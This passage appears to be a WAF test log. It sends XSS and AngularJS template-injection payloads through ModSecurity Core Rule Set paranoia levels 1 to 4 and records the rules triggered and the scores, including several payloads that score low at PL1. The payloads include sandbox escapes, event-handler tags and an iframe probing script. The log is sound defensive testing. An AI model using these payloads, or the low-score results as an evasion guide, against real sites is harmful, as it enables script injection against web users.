920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 47
******* payload-043-002 ***********
Payload:
payload={{$eval.constructor('alert(1)')()}}
--- Paranoia Level 1 ---
932100 PL1 Remote Command Execution: Unix Command Injection
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 10
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 23
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 39
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 52
******* payload-043-003 ***********
Payload:
payload={{$on.constructor('alert(1)')()}}
--- Paranoia Level 1 ---
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 5
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 18
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 34
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 47
******* payload-044-001 ***********
Payload:
payload={{toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)}}
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 8
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 24
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 37
******* payload-045-001 ***********
Payload:
payload=<input id=x ng-focus=$event.path|orderBy:'CSS&&[1].map(alert)'>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 31
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
******* payload-045-002 ***********
Payload:
payload=<input id=x ng-focus=$event.composedPath()|orderBy:'CSS&&[1].map(alert)'>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 31
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
******* payload-050-001 ***********
Payload:
payload=pos = 1000;found = false;
payload=var iframe = document.createElement('iframe');iframe.src='//x-domain.com';
payload=document.body.appendChild(iframe);iframe.onload = next;
payload=function next() {
payload= if(!found){
payload= document.getElementById('y').textContent = pos;
payload= iframe.src='//x-domain.com#'+pos;
payload= timer = setTimeout(function(){
payload= if(!found && pos < 2000) {
payload= pos++;
payload= }
payload= next();
payload= },50);
payload= }
payload=}
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 15
--- Paranoia Level 2 ---
934100 Node.js Injection Attack
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 66
--- Paranoia Level 3 ---
934100 Node.js Injection Attack
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
933161 PL3 PHP Injection Attack: Low-Value PHP Function Call Found
933161 PL3 PHP Injection Attack: Low-Value PHP Function Call Found
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 108
--- Paranoia Level 4 ---
934100 Node.js Injection Attack
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
933161 PL3 PHP Injection Attack: Low-Value PHP Function Call Found
933161 PL3 PHP Injection Attack: Low-Value PHP Function Call Found
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 137
******* payload-052-001 ***********
Payload:
payload=<a onfocus=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-052-002 ***********
Payload:
payload=<div onfocus=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-052-003 ***********
Payload:
payload=<xss onfocus=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
******* payload-053-001 ***********
Payload:
payload=<link onfocus=alert(1) id=x tabindex=1 style=display:block>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
******* payload-054-001 ***********
Payload:
payload=<a onfocusin=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-054-002 ***********
Payload:
payload=<div onfocusin=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-054-003 ***********
Payload:
payload=<xss onfocusin=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
******* payload-054-004 ***********
Payload:
payload=<xss onfocusout=alert(1) id=x tabindex=1><input autofocus>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-055-001 ***********
Payload:
payload=<a onactivate=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-055-002 ***********
Payload:
payload=<div onactivate=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
